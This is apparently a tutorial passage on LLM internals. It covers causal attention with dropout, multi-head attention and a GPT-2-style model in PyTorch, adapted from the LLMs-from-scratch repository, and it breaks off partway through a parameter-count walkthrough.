3. **Apply Softmax**: Compute the attention weights using the masked scores.

```python
attention_weights = torch.softmax(masked_scores, dim=-1)
```
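
The two fragments above assume `seq_len` and `attention_scores` already exist. A minimal self-contained sketch (with random stand-in scores for a 4-token sequence) shows the effect of the mask: each row only attends to the current and previous tokens and still sums to 1.

```python
import torch

seq_len = 4
attention_scores = torch.rand(seq_len, seq_len)   # stand-in scores for 4 tokens

# -inf above the diagonal, 0 on and below it
mask = torch.triu(torch.full((seq_len, seq_len), float("-inf")), diagonal=1)
masked_scores = attention_scores + mask

attention_weights = torch.softmax(masked_scores, dim=-1)
print(attention_weights)
# Row 0 is [1, 0, 0, 0]; every row has zeros after its own position and sums to 1
```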

### Masking Additional Attention Weights with Dropout

To **prevent overfitting**, we can apply **dropout** to the attention weights after the softmax operation. Dropout **randomly zeroes some of the attention weights** during training.
```python
dropout = nn.Dropout(p=0.5)
attention_weights = dropout(attention_weights)
```
A typical dropout rate is around 10-20%.
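
Note that `nn.Dropout` also rescales the surviving values by `1/(1-p)` during training so the expected magnitude stays the same, and it is a no-op in evaluation mode. A quick sketch to observe this (the exact zeroed positions are random):

```python
import torch
import torch.nn as nn

torch.manual_seed(123)
weights = torch.softmax(torch.rand(1, 6), dim=-1)   # example attention weights

dropout = nn.Dropout(p=0.5)
dropout.train()                 # dropout is only active in training mode
print(dropout(weights))         # roughly half the entries are 0, the rest scaled by 1/(1-p) = 2

dropout.eval()                  # in eval mode dropout does nothing
print(dropout(weights))         # unchanged
```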

### Code Example

Code example from [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb):
```python
import torch
import torch.nn as nn

inputs = torch.tensor(
  [[0.43, 0.15, 0.89], # Your     (x^1)
   [0.55, 0.87, 0.66], # journey  (x^2)
   [0.57, 0.85, 0.64], # starts   (x^3)
   [0.22, 0.58, 0.33], # with     (x^4)
   [0.77, 0.25, 0.10], # one      (x^5)
   [0.05, 0.80, 0.55]] # step     (x^6)
)

batch = torch.stack((inputs, inputs), dim=0)
print(batch.shape)

class CausalAttention(nn.Module):

    def __init__(self, d_in, d_out, context_length,
                 dropout, qkv_bias=False):
        super().__init__()
        self.d_out = d_out
        self.W_query = nn.Linear(d_in, d_out, bias=qkv_bias)
        self.W_key = nn.Linear(d_in, d_out, bias=qkv_bias)
        self.W_value = nn.Linear(d_in, d_out, bias=qkv_bias)
        self.dropout = nn.Dropout(dropout)
        self.register_buffer('mask', torch.triu(torch.ones(context_length, context_length), diagonal=1)) # New

    def forward(self, x):
        b, num_tokens, d_in = x.shape
        # b is the num of batches
        # num_tokens is the number of tokens per batch
        # d_in is the dimensions per token

        keys = self.W_key(x) # This generates the keys of the tokens
        queries = self.W_query(x)
        values = self.W_value(x)

        attn_scores = queries @ keys.transpose(1, 2) # Moves the third dimension to the second one and the second one to the third one to be able to multiply
        attn_scores.masked_fill_( # New, _ ops are in-place
            self.mask.bool()[:num_tokens, :num_tokens], -torch.inf) # `:num_tokens` to account for cases where the number of tokens in the batch is smaller than the supported context_size
        attn_weights = torch.softmax(
            attn_scores / keys.shape[-1]**0.5, dim=-1
        )
        attn_weights = self.dropout(attn_weights)

        context_vec = attn_weights @ values
        return context_vec

torch.manual_seed(123)

context_length = batch.shape[1]
d_in = 3
d_out = 2
ca = CausalAttention(d_in, d_out, context_length, 0.0)

context_vecs = ca(batch)

print(context_vecs)
print("context_vecs.shape:", context_vecs.shape)
```
## Extending Single-Head Attention to Multi-Head Attention

**Multi-head attention** in practical terms consists of running **multiple instances** of the self-attention function, each with **its own weights**, so that different final vectors are computed.

### Code Example

It would be possible to reuse the previous code and just add a wrapper that launches it several times, but this is a more optimized version from [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb) that processes all the heads at the same time (reducing the number of expensive for loops). As you can see in the code, the dimensions of each token are split across the heads: if a token has 8 dimensions and we want to use 2 heads, the dimensions are split into 2 arrays of 4 dimensions each and each head uses one of them:
```python
class MultiHeadAttention(nn.Module):
    def __init__(self, d_in, d_out, context_length, dropout, num_heads, qkv_bias=False):
        super().__init__()
        assert (d_out % num_heads == 0), \
            "d_out must be divisible by num_heads"

        self.d_out = d_out
        self.num_heads = num_heads
        self.head_dim = d_out // num_heads # Reduce the projection dim to match desired output dim

        self.W_query = nn.Linear(d_in, d_out, bias=qkv_bias)
        self.W_key = nn.Linear(d_in, d_out, bias=qkv_bias)
        self.W_value = nn.Linear(d_in, d_out, bias=qkv_bias)
        self.out_proj = nn.Linear(d_out, d_out) # Linear layer to combine head outputs
        self.dropout = nn.Dropout(dropout)
        self.register_buffer(
            "mask",
            torch.triu(torch.ones(context_length, context_length),
                       diagonal=1)
        )

    def forward(self, x):
        b, num_tokens, d_in = x.shape
        # b is the num of batches
        # num_tokens is the number of tokens per batch
        # d_in is the dimensions per token

        keys = self.W_key(x) # Shape: (b, num_tokens, d_out)
        queries = self.W_query(x)
        values = self.W_value(x)

        # We implicitly split the matrix by adding a `num_heads` dimension
        # Unroll last dim: (b, num_tokens, d_out) -> (b, num_tokens, num_heads, head_dim)
        keys = keys.view(b, num_tokens, self.num_heads, self.head_dim)
        values = values.view(b, num_tokens, self.num_heads, self.head_dim)
        queries = queries.view(b, num_tokens, self.num_heads, self.head_dim)

        # Transpose: (b, num_tokens, num_heads, head_dim) -> (b, num_heads, num_tokens, head_dim)
        keys = keys.transpose(1, 2)
        queries = queries.transpose(1, 2)
        values = values.transpose(1, 2)

        # Compute scaled dot-product attention (aka self-attention) with a causal mask
        attn_scores = queries @ keys.transpose(2, 3) # Dot product for each head

        # Original mask truncated to the number of tokens and converted to boolean
        mask_bool = self.mask.bool()[:num_tokens, :num_tokens]

        # Use the mask to fill attention scores
        attn_scores.masked_fill_(mask_bool, -torch.inf)

        attn_weights = torch.softmax(attn_scores / keys.shape[-1]**0.5, dim=-1)
        attn_weights = self.dropout(attn_weights)

        # Shape: (b, num_tokens, num_heads, head_dim)
        context_vec = (attn_weights @ values).transpose(1, 2)

        # Combine heads, where self.d_out = self.num_heads * self.head_dim
        context_vec = context_vec.contiguous().view(b, num_tokens, self.d_out)
        context_vec = self.out_proj(context_vec) # optional projection

        return context_vec

torch.manual_seed(123)

batch_size, context_length, d_in = batch.shape
d_out = 2
mha = MultiHeadAttention(d_in, d_out, context_length, 0.0, num_heads=2)

context_vecs = mha(batch)

print(context_vecs)
print("context_vecs.shape:", context_vecs.shape)
```
For another compact and efficient implementation, you could use the [`torch.nn.MultiheadAttention`](https://pytorch.org/docs/stable/generated/torch.nn.MultiheadAttention.html) class in PyTorch.
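
As a rough usage sketch (an assumption about typical usage of that class, not code from the referenced notebook): for self-attention the same tensor is passed as query, key and value, and a boolean upper-triangular `attn_mask` makes it causal.

```python
import torch
import torch.nn as nn

torch.manual_seed(123)

embed_dim, num_heads, seq_len, batch_size = 8, 2, 6, 2
x = torch.rand(batch_size, seq_len, embed_dim)          # (batch, tokens, embedding)

mha = nn.MultiheadAttention(embed_dim, num_heads, batch_first=True)

# Boolean causal mask: True marks positions that must NOT be attended to
causal_mask = torch.triu(torch.ones(seq_len, seq_len, dtype=torch.bool), diagonal=1)

# Self-attention: the same tensor is used as query, key and value
context, attn_weights = mha(x, x, x, attn_mask=causal_mask)
print(context.shape)        # torch.Size([2, 6, 8])
print(attn_weights.shape)   # torch.Size([2, 6, 6]) (averaged over heads by default)
```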

> [!TIP]
> Short answer from ChatGPT about why it is better to split the dimensions of the tokens among the heads instead of having each head check all the dimensions of all the tokens:
>
> While allowing each head to process all embedding dimensions might seem advantageous because each head would have access to the full information, the standard practice is to **divide the embedding dimensions among the heads**. This approach balances computational efficiency with model performance and encourages each head to learn diverse representations. Therefore, splitting the embedding dimensions is generally preferred over having each head check all the dimensions.

## References

- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)

@ -1,666 +0,0 @@
# 5. LLM Architecture

## LLM Architecture

> [!TIP]
> The goal of this fifth phase is very simple: **Develop the architecture of the full LLM**. Put everything together, apply all the layers, and create all the functions to generate text or transform text to IDs and back.
>
> This architecture will be used both for training and for predicting text after it has been trained.

LLM architecture example from [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch04/01_main-chapter-code/ch04.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch04/01_main-chapter-code/ch04.ipynb):

A high-level representation can be observed in:

<figure><img src="../../images/image (3) (1) (1) (1).png" alt="" width="563"><figcaption><p><a href="https://camo.githubusercontent.com/6c8c392f72d5b9e86c94aeb9470beab435b888d24135926f1746eb88e0cc18fb/68747470733a2f2f73656261737469616e72617363686b612e636f6d2f696d616765732f4c4c4d732d66726f6d2d736372617463682d696d616765732f636830345f636f6d707265737365642f31332e776562703f31">https://camo.githubusercontent.com/6c8c392f72d5b9e86c94aeb9470beab435b888d24135926f1746eb88e0cc18fb/68747470733a2f2f73656261737469616e72617363686b612e636f6d2f696d616765732f4c4c4d732d66726f6d2d736372617463682d696d616765732f636830345f636f6d707265737365642f31332e776562703f31</a></p></figcaption></figure>

1. **Input (Tokenized Text)**: The process starts with tokenized text, which is converted into numerical representations.
2. **Token Embedding and Positional Embedding Layer**: The tokenized text is passed through a **token embedding** layer and a **positional embedding layer**, which captures the position of tokens in a sequence, critical for understanding word order.
3. **Transformer Blocks**: The model contains **12 transformer blocks**, each with multiple layers. These blocks repeat the following sequence:
- **Masked Multi-Head Attention**: Allows the model to focus on different parts of the input text at the same time.
- **Layer Normalization**: A normalization step to stabilize and improve training.
- **Feed Forward Layer**: Responsible for processing the information from the attention layer and making predictions about the next token.
- **Dropout Layers**: These layers prevent overfitting by randomly dropping units during training.
4. **Final Output Layer**: The model outputs a **4x50,257-dimensional tensor**, where **50,257** represents the size of the vocabulary. Each row in this tensor corresponds to a vector that the model uses to predict the next word in the sequence.
5. **Goal**: The goal is to take these embeddings and turn them back into text. Specifically, the last row of the output is used to generate the next word, represented as "forward" in this diagram.

### Code representation
```python
import torch
import torch.nn as nn
import tiktoken

class GELU(nn.Module):
    def __init__(self):
        super().__init__()

    def forward(self, x):
        return 0.5 * x * (1 + torch.tanh(
            torch.sqrt(torch.tensor(2.0 / torch.pi)) *
            (x + 0.044715 * torch.pow(x, 3))
        ))

class FeedForward(nn.Module):
    def __init__(self, cfg):
        super().__init__()
        self.layers = nn.Sequential(
            nn.Linear(cfg["emb_dim"], 4 * cfg["emb_dim"]),
            GELU(),
            nn.Linear(4 * cfg["emb_dim"], cfg["emb_dim"]),
        )

    def forward(self, x):
        return self.layers(x)

class MultiHeadAttention(nn.Module):
    def __init__(self, d_in, d_out, context_length, dropout, num_heads, qkv_bias=False):
        super().__init__()
        assert d_out % num_heads == 0, "d_out must be divisible by num_heads"

        self.d_out = d_out
        self.num_heads = num_heads
        self.head_dim = d_out // num_heads # Reduce the projection dim to match desired output dim

        self.W_query = nn.Linear(d_in, d_out, bias=qkv_bias)
        self.W_key = nn.Linear(d_in, d_out, bias=qkv_bias)
        self.W_value = nn.Linear(d_in, d_out, bias=qkv_bias)
        self.out_proj = nn.Linear(d_out, d_out) # Linear layer to combine head outputs
        self.dropout = nn.Dropout(dropout)
        self.register_buffer('mask', torch.triu(torch.ones(context_length, context_length), diagonal=1))

    def forward(self, x):
        b, num_tokens, d_in = x.shape

        keys = self.W_key(x) # Shape: (b, num_tokens, d_out)
        queries = self.W_query(x)
        values = self.W_value(x)

        # We implicitly split the matrix by adding a `num_heads` dimension
        # Unroll last dim: (b, num_tokens, d_out) -> (b, num_tokens, num_heads, head_dim)
        keys = keys.view(b, num_tokens, self.num_heads, self.head_dim)
        values = values.view(b, num_tokens, self.num_heads, self.head_dim)
        queries = queries.view(b, num_tokens, self.num_heads, self.head_dim)

        # Transpose: (b, num_tokens, num_heads, head_dim) -> (b, num_heads, num_tokens, head_dim)
        keys = keys.transpose(1, 2)
        queries = queries.transpose(1, 2)
        values = values.transpose(1, 2)

        # Compute scaled dot-product attention (aka self-attention) with a causal mask
        attn_scores = queries @ keys.transpose(2, 3) # Dot product for each head

        # Original mask truncated to the number of tokens and converted to boolean
        mask_bool = self.mask.bool()[:num_tokens, :num_tokens]

        # Use the mask to fill attention scores
        attn_scores.masked_fill_(mask_bool, -torch.inf)

        attn_weights = torch.softmax(attn_scores / keys.shape[-1]**0.5, dim=-1)
        attn_weights = self.dropout(attn_weights)

        # Shape: (b, num_tokens, num_heads, head_dim)
        context_vec = (attn_weights @ values).transpose(1, 2)

        # Combine heads, where self.d_out = self.num_heads * self.head_dim
        context_vec = context_vec.contiguous().view(b, num_tokens, self.d_out)
        context_vec = self.out_proj(context_vec) # optional projection

        return context_vec

class LayerNorm(nn.Module):
    def __init__(self, emb_dim):
        super().__init__()
        self.eps = 1e-5
        self.scale = nn.Parameter(torch.ones(emb_dim))
        self.shift = nn.Parameter(torch.zeros(emb_dim))

    def forward(self, x):
        mean = x.mean(dim=-1, keepdim=True)
        var = x.var(dim=-1, keepdim=True, unbiased=False)
        norm_x = (x - mean) / torch.sqrt(var + self.eps)
        return self.scale * norm_x + self.shift

class TransformerBlock(nn.Module):
    def __init__(self, cfg):
        super().__init__()
        self.att = MultiHeadAttention(
            d_in=cfg["emb_dim"],
            d_out=cfg["emb_dim"],
            context_length=cfg["context_length"],
            num_heads=cfg["n_heads"],
            dropout=cfg["drop_rate"],
            qkv_bias=cfg["qkv_bias"])
        self.ff = FeedForward(cfg)
        self.norm1 = LayerNorm(cfg["emb_dim"])
        self.norm2 = LayerNorm(cfg["emb_dim"])
        self.drop_shortcut = nn.Dropout(cfg["drop_rate"])

    def forward(self, x):
        # Shortcut connection for attention block
        shortcut = x
        x = self.norm1(x)
        x = self.att(x)   # Shape [batch_size, num_tokens, emb_size]
        x = self.drop_shortcut(x)
        x = x + shortcut  # Add the original input back

        # Shortcut connection for feed forward block
        shortcut = x
        x = self.norm2(x)
        x = self.ff(x)
        x = self.drop_shortcut(x)
        x = x + shortcut  # Add the original input back

        return x


class GPTModel(nn.Module):
    def __init__(self, cfg):
        super().__init__()
        self.tok_emb = nn.Embedding(cfg["vocab_size"], cfg["emb_dim"])
        self.pos_emb = nn.Embedding(cfg["context_length"], cfg["emb_dim"])
        self.drop_emb = nn.Dropout(cfg["drop_rate"])

        self.trf_blocks = nn.Sequential(
            *[TransformerBlock(cfg) for _ in range(cfg["n_layers"])])

        self.final_norm = LayerNorm(cfg["emb_dim"])
        self.out_head = nn.Linear(
            cfg["emb_dim"], cfg["vocab_size"], bias=False
        )

    def forward(self, in_idx):
        batch_size, seq_len = in_idx.shape
        tok_embeds = self.tok_emb(in_idx)
        pos_embeds = self.pos_emb(torch.arange(seq_len, device=in_idx.device))
        x = tok_embeds + pos_embeds  # Shape [batch_size, num_tokens, emb_size]
        x = self.drop_emb(x)
        x = self.trf_blocks(x)
        x = self.final_norm(x)
        logits = self.out_head(x)
        return logits

GPT_CONFIG_124M = {
    "vocab_size": 50257,    # Vocabulary size
    "context_length": 1024, # Context length
    "emb_dim": 768,         # Embedding dimension
    "n_heads": 12,          # Number of attention heads
    "n_layers": 12,         # Number of layers
    "drop_rate": 0.1,       # Dropout rate
    "qkv_bias": False       # Query-Key-Value bias
}

torch.manual_seed(123)
model = GPTModel(GPT_CONFIG_124M)

# Example input batch of token IDs (assumed here; built with the GPT-2 BPE tokenizer)
tokenizer = tiktoken.get_encoding("gpt2")
batch = torch.stack([
    torch.tensor(tokenizer.encode("Every effort moves you")),
    torch.tensor(tokenizer.encode("Every day holds a")),
], dim=0)

out = model(batch)
print("Input batch:\n", batch)
print("\nOutput shape:", out.shape)
print(out)
```
### **GELU Activation Function**
```python
# From https://github.com/rasbt/LLMs-from-scratch/tree/main/ch04
class GELU(nn.Module):
    def __init__(self):
        super().__init__()

    def forward(self, x):
        return 0.5 * x * (1 + torch.tanh(
            torch.sqrt(torch.tensor(2.0 / torch.pi)) *
            (x + 0.044715 * torch.pow(x, 3))
        ))
```
#### **Purpose and Functionality**

- **GELU (Gaussian Error Linear Unit):** An activation function that introduces non-linearity into the model.
- **Smooth Activation:** Unlike ReLU, which zeroes out negative inputs, GELU smoothly maps inputs to outputs, allowing small, non-zero values for negative inputs.
- **Mathematical Definition:**

<figure><img src="../../images/image (2) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>

> [!NOTE]
> The goal of using this function after the linear layers inside the FeedForward layer is to turn the linear outputs into non-linear ones so the model can learn complex, non-linear relationships.
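
A small sketch (assuming the `GELU` class above) contrasting GELU with ReLU on a few inputs, showing that negative inputs keep small non-zero outputs instead of being clipped to 0:

```python
import torch
import torch.nn as nn

x = torch.tensor([-3.0, -1.0, -0.5, 0.0, 0.5, 1.0, 3.0])

gelu = GELU()        # tanh-approximation GELU defined above
relu = nn.ReLU()

print(relu(x))       # negative inputs are clipped to exactly 0
print(gelu(x))       # negative inputs map to small negative values, e.g. GELU(-1.0) ≈ -0.159
```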

### **FeedForward Neural Network**

_Shapes have been added as comments to better understand the shapes of the matrices:_
```python
# From https://github.com/rasbt/LLMs-from-scratch/tree/main/ch04
class FeedForward(nn.Module):
    def __init__(self, cfg):
        super().__init__()
        self.layers = nn.Sequential(
            nn.Linear(cfg["emb_dim"], 4 * cfg["emb_dim"]),
            GELU(),
            nn.Linear(4 * cfg["emb_dim"], cfg["emb_dim"]),
        )

    def forward(self, x):
        # x shape: (batch_size, seq_len, emb_dim)

        x = self.layers[0](x)  # x shape: (batch_size, seq_len, 4 * emb_dim)
        x = self.layers[1](x)  # x shape remains: (batch_size, seq_len, 4 * emb_dim)
        x = self.layers[2](x)  # x shape: (batch_size, seq_len, emb_dim)
        return x  # Output shape: (batch_size, seq_len, emb_dim)
```
#### **Purpose and Functionality**

- **Position-wise FeedForward Network:** Applies a two-layer fully connected network to each position separately and identically.
- **Layer Details:**
- **First Linear Layer:** Expands the dimension from `emb_dim` to `4 * emb_dim`.
- **GELU Activation:** Applies non-linearity.
- **Second Linear Layer:** Reduces the dimension back to `emb_dim`.

> [!NOTE]
> As you can see, the Feed Forward network uses 3 layers. The first one is a linear layer that multiplies the dimensions by 4 using linear weights (parameters to train inside the model). Then, the GELU function is applied to all those dimensions to introduce non-linear variations that capture richer representations, and finally another linear layer is used to return to the original dimension size.
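
A quick shape check (assuming the `FeedForward` and `GELU` classes above and an embedding dimension of 768) showing that the expansion and contraction leave the tensor shape unchanged:

```python
import torch

cfg = {"emb_dim": 768}
ff = FeedForward(cfg)

x = torch.rand(2, 4, 768)      # (batch_size, seq_len, emb_dim)
print(ff(x).shape)             # torch.Size([2, 4, 768])
```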
### **Multi-Head Attention Mechanism**

This was already explained in an earlier section.

#### **Purpose and Functionality**

- **Multi-Head Self-Attention:** Allows the model to focus on different positions within the input sequence when encoding a token.
- **Key Components:**
- **Queries, Keys, Values:** Linear projections of the input, used to compute the attention scores.
- **Heads:** Multiple attention mechanisms running in parallel (`num_heads`), each with a reduced dimension (`head_dim`).
- **Attention Scores:** Computed as the dot product of queries and keys, scaled and masked.
- **Masking:** A causal mask is applied to prevent the model from attending to future tokens (important for autoregressive models like GPT).
- **Attention Weights:** Softmax of the masked and scaled attention scores.
- **Context Vector:** Weighted sum of the values, according to the attention weights.
- **Output Projection:** Linear layer to combine the outputs of all the heads.

> [!NOTE]
> The goal of this network is to find the relationships between tokens in the same context. Moreover, the tokens are divided among different heads in order to prevent overfitting, although the final relationships found per head are combined at the end of this network.
>
> In addition, during training a **causal mask** is applied so that later tokens are not taken into account when looking at the specific relationships with a token, and **dropout** is also applied to **prevent overfitting**.
### **Layer** Normalization
```python
# From https://github.com/rasbt/LLMs-from-scratch/tree/main/ch04
class LayerNorm(nn.Module):
    def __init__(self, emb_dim):
        super().__init__()
        self.eps = 1e-5 # Prevent division by zero during normalization.
        self.scale = nn.Parameter(torch.ones(emb_dim))
        self.shift = nn.Parameter(torch.zeros(emb_dim))

    def forward(self, x):
        mean = x.mean(dim=-1, keepdim=True)
        var = x.var(dim=-1, keepdim=True, unbiased=False)
        norm_x = (x - mean) / torch.sqrt(var + self.eps)
        return self.scale * norm_x + self.shift
```
#### **Purpose and Functionality**

- **Layer Normalization:** A technique used to normalize the inputs across the features (embedding dimensions) for each individual example in a batch.
- **Components:**
- **`eps`:** A small constant (`1e-5`) added to the variance to prevent division by zero during normalization.
- **`scale` and `shift`:** Learnable parameters (`nn.Parameter`) that allow the model to scale and shift the normalized output. They are initialized to ones and zeros respectively.
- **Normalization Process:**
- **Compute Mean (`mean`):** Computes the mean of the input `x` across the embedding dimension (`dim=-1`), keeping the dimension for broadcasting (`keepdim=True`).
- **Compute Variance (`var`):** Computes the variance of `x` across the embedding dimension, also keeping the dimension. The `unbiased=False` parameter ensures the variance is computed with the biased estimator (dividing by `N` instead of `N-1`), which is appropriate when normalizing over features rather than samples.
- **Normalize (`norm_x`):** Subtracts the mean from `x` and divides by the square root of the variance plus `eps`.
- **Scale and Shift:** Applies the learnable `scale` and `shift` parameters to the normalized output.

> [!NOTE]
> The goal is to ensure a mean of 0 and a variance of 1 across all dimensions of the same token. The purpose of this is to **stabilize the training of deep neural networks** by reducing internal covariate shift, which refers to the change in the distribution of network activations caused by the updating of parameters during training.
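
A small sketch (assuming the `LayerNorm` class above) verifying that, with the initial `scale` and `shift` values, every token ends up with mean close to 0 and variance close to 1:

```python
import torch

torch.manual_seed(123)
x = torch.randn(2, 4, 8)                 # (batch_size, seq_len, emb_dim)

ln = LayerNorm(emb_dim=8)
out = ln(x)

# With scale=1 and shift=0 (their initial values), every token is standardized
print(out.mean(dim=-1))                  # ≈ 0 for every (batch, token) position
print(out.var(dim=-1, unbiased=False))   # ≈ 1 for every (batch, token) position
```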

### **Transformer Block**

_Shapes have been added as comments to better understand the shapes of the matrices:_
```python
# From https://github.com/rasbt/LLMs-from-scratch/tree/main/ch04

class TransformerBlock(nn.Module):
    def __init__(self, cfg):
        super().__init__()
        self.att = MultiHeadAttention(
            d_in=cfg["emb_dim"],
            d_out=cfg["emb_dim"],
            context_length=cfg["context_length"],
            num_heads=cfg["n_heads"],
            dropout=cfg["drop_rate"],
            qkv_bias=cfg["qkv_bias"]
        )
        self.ff = FeedForward(cfg)
        self.norm1 = LayerNorm(cfg["emb_dim"])
        self.norm2 = LayerNorm(cfg["emb_dim"])
        self.drop_shortcut = nn.Dropout(cfg["drop_rate"])

    def forward(self, x):
        # x shape: (batch_size, seq_len, emb_dim)

        # Shortcut connection for attention block
        shortcut = x               # shape: (batch_size, seq_len, emb_dim)
        x = self.norm1(x)          # shape remains (batch_size, seq_len, emb_dim)
        x = self.att(x)            # shape: (batch_size, seq_len, emb_dim)
        x = self.drop_shortcut(x)  # shape remains (batch_size, seq_len, emb_dim)
        x = x + shortcut           # shape: (batch_size, seq_len, emb_dim)

        # Shortcut connection for feedforward block
        shortcut = x               # shape: (batch_size, seq_len, emb_dim)
        x = self.norm2(x)          # shape remains (batch_size, seq_len, emb_dim)
        x = self.ff(x)             # shape: (batch_size, seq_len, emb_dim)
        x = self.drop_shortcut(x)  # shape remains (batch_size, seq_len, emb_dim)
        x = x + shortcut           # shape: (batch_size, seq_len, emb_dim)

        return x  # Output shape: (batch_size, seq_len, emb_dim)
```
#### **Purpose and Functionality**

- **Composition of Layers:** Combines multi-head attention, a feedforward network, layer normalization, and residual connections.
- **Layer Normalization:** Applied before the attention and feedforward layers for stable training.
- **Residual Connections (Shortcuts):** Add the input of a layer to its output to improve gradient flow and enable the training of deep networks.
- **Dropout:** Applied after the attention and feedforward layers for regularization.

#### **Step-by-Step Functionality**

1. **First Residual Path (Self-Attention):**
- **Input (`shortcut`):** Save the original input for the residual connection.
- **Layer Norm (`norm1`):** Normalize the input.
- **Multi-Head Attention (`att`):** Apply self-attention.
- **Dropout (`drop_shortcut`):** Apply dropout for regularization.
- **Add Residual (`x + shortcut`):** Combine with the original input.
2. **Second Residual Path (FeedForward):**
- **Input (`shortcut`):** Save the updated input for the next residual connection.
- **Layer Norm (`norm2`):** Normalize the input.
- **FeedForward Network (`ff`):** Apply the feedforward transformation.
- **Dropout (`drop_shortcut`):** Apply dropout.
- **Add Residual (`x + shortcut`):** Combine with the input of the first residual path.

> [!NOTE]
> The transformer block groups all the networks together and applies some **normalization** and **dropout** to improve the training stability and results.\
> Note how dropout is applied after using each network while normalization is applied before.
>
> Moreover, it also uses shortcuts, which consist of **adding the output of a network to its input**. This helps prevent the vanishing gradient problem by ensuring that the initial layers contribute "as much" as the last ones.
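
A similar quick check (assuming the `TransformerBlock` class and the `GPT_CONFIG_124M` config shown earlier on this page) confirming that a transformer block preserves the input shape:

```python
import torch

torch.manual_seed(123)
block = TransformerBlock(GPT_CONFIG_124M)

x = torch.rand(2, 4, GPT_CONFIG_124M["emb_dim"])   # (batch_size, seq_len, emb_dim)
print(block(x).shape)                              # torch.Size([2, 4, 768]), same shape in, same shape out
```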
### **GPTModel**

_Shapes have been added as comments to better understand the shapes of the matrices:_
```python
# From https://github.com/rasbt/LLMs-from-scratch/tree/main/ch04
class GPTModel(nn.Module):
    def __init__(self, cfg):
        super().__init__()
        self.tok_emb = nn.Embedding(cfg["vocab_size"], cfg["emb_dim"])
        # shape: (vocab_size, emb_dim)

        self.pos_emb = nn.Embedding(cfg["context_length"], cfg["emb_dim"])
        # shape: (context_length, emb_dim)

        self.drop_emb = nn.Dropout(cfg["drop_rate"])

        self.trf_blocks = nn.Sequential(
            *[TransformerBlock(cfg) for _ in range(cfg["n_layers"])]
        )
        # Stack of TransformerBlocks

        self.final_norm = LayerNorm(cfg["emb_dim"])
        self.out_head = nn.Linear(cfg["emb_dim"], cfg["vocab_size"], bias=False)
        # shape: (emb_dim, vocab_size)

    def forward(self, in_idx):
        # in_idx shape: (batch_size, seq_len)
        batch_size, seq_len = in_idx.shape

        # Token embeddings
        tok_embeds = self.tok_emb(in_idx)
        # shape: (batch_size, seq_len, emb_dim)

        # Positional embeddings
        pos_indices = torch.arange(seq_len, device=in_idx.device)
        # shape: (seq_len,)
        pos_embeds = self.pos_emb(pos_indices)
        # shape: (seq_len, emb_dim)

        # Add token and positional embeddings
        x = tok_embeds + pos_embeds  # Broadcasting over batch dimension
        # x shape: (batch_size, seq_len, emb_dim)

        x = self.drop_emb(x)  # Dropout applied
        # x shape remains: (batch_size, seq_len, emb_dim)

        x = self.trf_blocks(x)  # Pass through Transformer blocks
        # x shape remains: (batch_size, seq_len, emb_dim)

        x = self.final_norm(x)  # Final LayerNorm
        # x shape remains: (batch_size, seq_len, emb_dim)

        logits = self.out_head(x)  # Project to vocabulary size
        # logits shape: (batch_size, seq_len, vocab_size)

        return logits  # Output shape: (batch_size, seq_len, vocab_size)
```
#### **Purpose and Functionality**

- **Embedding Layers:**
- **Token Embeddings (`tok_emb`):** Converts token indices into embeddings. As a reminder, these are the weights assigned to each dimension of each token in the vocabulary.
- **Positional Embeddings (`pos_emb`):** Adds positional information to the embeddings to capture the order of tokens. As a reminder, these are the weights assigned to tokens according to their position in the text.
- **Dropout (`drop_emb`):** Applied to the embeddings for regularization.
- **Transformer Blocks (`trf_blocks`):** Stack of `n_layers` transformer blocks to process the embeddings.
- **Final Normalization (`final_norm`):** Layer normalization before the output layer.
- **Output Layer (`out_head`):** Projects the final hidden states to the vocabulary size to produce logits for prediction.

> [!NOTE]
> The goal of this class is to use all the other mentioned networks to **predict the next token in a sequence**, which is fundamental for tasks like text generation.
>
> Note how it will **use as many transformer blocks as indicated** and that each transformer block uses one multi-head attention net, one feed forward net, and several normalizations. So if 12 transformer blocks are used, multiply this by 12.
>
> Moreover, a **normalization** layer is added **before** the **output** and a final linear layer is applied at the end to obtain the results with the proper dimensions. Note how each final vector has the size of the vocabulary used. This is because it tries to obtain a probability per possible token within the vocabulary.
## Number of Parameters to Train

With the GPT structure defined, it is possible to determine the number of parameters to train:
```python
GPT_CONFIG_124M = {
    "vocab_size": 50257,    # Vocabulary size
    "context_length": 1024, # Context length
    "emb_dim": 768,         # Embedding dimension
    "n_heads": 12,          # Number of attention heads
    "n_layers": 12,         # Number of layers
    "drop_rate": 0.1,       # Dropout rate
    "qkv_bias": False       # Query-Key-Value bias
}

model = GPTModel(GPT_CONFIG_124M)
total_params = sum(p.numel() for p in model.parameters())
print(f"Total number of parameters: {total_params:,}")
# Total number of parameters: 163,009,536
```
### **Step-by-Step Calculation**

#### **1. Embedding Layers: Token Embedding & Position Embedding**

- **Layer:** `nn.Embedding(vocab_size, emb_dim)`
- **Parameters:** `vocab_size * emb_dim`
```python
token_embedding_params = 50257 * 768 = 38,597,376
```
- **Layer:** `nn.Embedding(context_length, emb_dim)`
- **Parameters:** `context_length * emb_dim`
```python
position_embedding_params = 1024 * 768 = 786,432
```
**Total Embedding Parameters**
```python
embedding_params = token_embedding_params + position_embedding_params
embedding_params = 38,597,376 + 786,432 = 39,383,808
```
#### **2. Transformer Blocks**

There are 12 transformer blocks, so we will compute the parameters for one block and then multiply by 12.

**Parameters per Transformer Block**

**a. Multi-Head Attention**

- **Components:**
  - **Query Linear Layer (`W_query`):** `nn.Linear(emb_dim, emb_dim, bias=False)`
  - **Key Linear Layer (`W_key`):** `nn.Linear(emb_dim, emb_dim, bias=False)`
  - **Value Linear Layer (`W_value`):** `nn.Linear(emb_dim, emb_dim, bias=False)`
  - **Output Projection (`out_proj`):** `nn.Linear(emb_dim, emb_dim)`
- **Calculations:**

  - **Each of `W_query`, `W_key`, `W_value`:**

    ```python
    qkv_params = emb_dim * emb_dim = 768 * 768 = 589,824
    ```

    Since there are three such layers:

    ```python
